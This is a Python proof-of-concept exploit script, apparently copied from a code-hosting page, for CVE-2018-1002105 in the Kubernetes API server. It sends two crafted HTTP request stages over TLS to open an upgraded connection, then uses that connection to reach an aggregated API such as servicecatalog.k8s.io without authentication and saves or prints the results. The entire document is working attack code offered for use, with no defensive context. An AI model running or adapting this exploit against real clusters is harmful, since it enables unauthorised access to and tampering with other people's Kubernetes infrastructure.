1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 |
#!/usr/bin/env python3 import argparse from ssl import wrap_socket from json import loads, dumps from socket import create_connection def request_stage_1(base, version, target): stage_1 = "" with open('ustage_1', 'r') as stage_1_fd: stage_1 = stage_1_fd.read() return stage_1.format(base, version, target ).encode('utf-8') def request_stage_2(base, version, target_api, target): stage_2 = "" with open('ustage_2', 'r') as stage_2_fd: stage_2 = stage_2_fd.read() return stage_2.format(base, version, target_api, target, ).encode('utf-8') def read_data(ssock): data = [] data_incoming = True while data_incoming: data_in = ssock.recv(4096) if not data_in: data_incoming = False elif data_in.find(b'\n\r\n0\r\n\r\n') != -1: data_incoming = False offset_1 = data_in.find(b'{') offset_2 = data_in.find(b'}\n') if offset_1 != -1 and offset_2 != -1: data_in = data_in[offset_1-1:offset_2+1] elif offset_1 != -1: data_in = data_in[offset_1-1:] elif offset_2 != -1: data_in = data_in[:offset_2-1] data.append(data_in) return data def run_exploit(target, stage_1, stage_2, filename, json): host, port = target.split(':') with create_connection((host, port)) as sock: with wrap_socket(sock) as ssock: print('[*] Building pipe ...') ssock.send(stage_1) data_in = ssock.recv(15) if b'HTTP/1.1 200 OK' in data_in: print('[+] Pipe opened :D') read_data(ssock) else: print('[-] Not sure if this went well...') print(f"[*] Attempting to access url") ssock.send(stage_2) data_in = ssock.recv(15) if b'HTTP/1.1 200 OK' in data_in: print('[+] Pipe opened :D') data = read_data(ssock) return data def parse_output(data, json, filename): if json: j = loads(''.join(i.decode('utf-8') for i in data)) data = dumps(j, indent=4) if filename: mode = 'w+' else: mode = 'wb+' if filename: print(f"[*] Writing output to {filename} ....") with open(filename, mode) as fd: if json: fd.write(data) else: for msg in data: fd.write(msg) print('[+] Done!') else: if json: print(data) else: print(''.join(msg.decode('unicode_escape') for msg in data)) def main(): parser = argparse.ArgumentParser(description='Unauthenticated PoC for' ' CVE-2018-1002105') required = parser.add_argument_group('required arguments') optional = parser.add_argument_group('optional arguments') required.add_argument('--target', '-t', dest='target', type=str, help='API server target:port', required=True) required.add_argument('--api-base', '-b', dest='base', type=str, help='Target API name i.e. "servicecatalog.k8s.io"', default="servicecatalog.k8s.io") required.add_argument('--api-target', '-u', dest='target_api', type=str, help='API to access i.e. "clusterservicebrokers"', default="clusterservicebrokers") optional.add_argument('--api-version', '-a', dest='version', type=str, help='API version to use i.e. "v1beta1"', default="v1beta1") optional.add_argument('--json', '-j', dest='json', action='store_true', help='Print json output', default=False) optional.add_argument('--filename', '-f', dest='filename', type=str, help='File to save output to', default=False) args = parser.parse_args() if args.target.find(':') == -1: print("f[-] invalid target {args.target}") return False stage1 = request_stage_1(args.base, args.version, args.target) stage2 = request_stage_2(args.base, args.version, args.target_api, args.target) output = run_exploit(args.target, stage1, stage2, args.filename, args.json) parse_output(output, args.json, args.filename) if __name__ == '__main__': main() |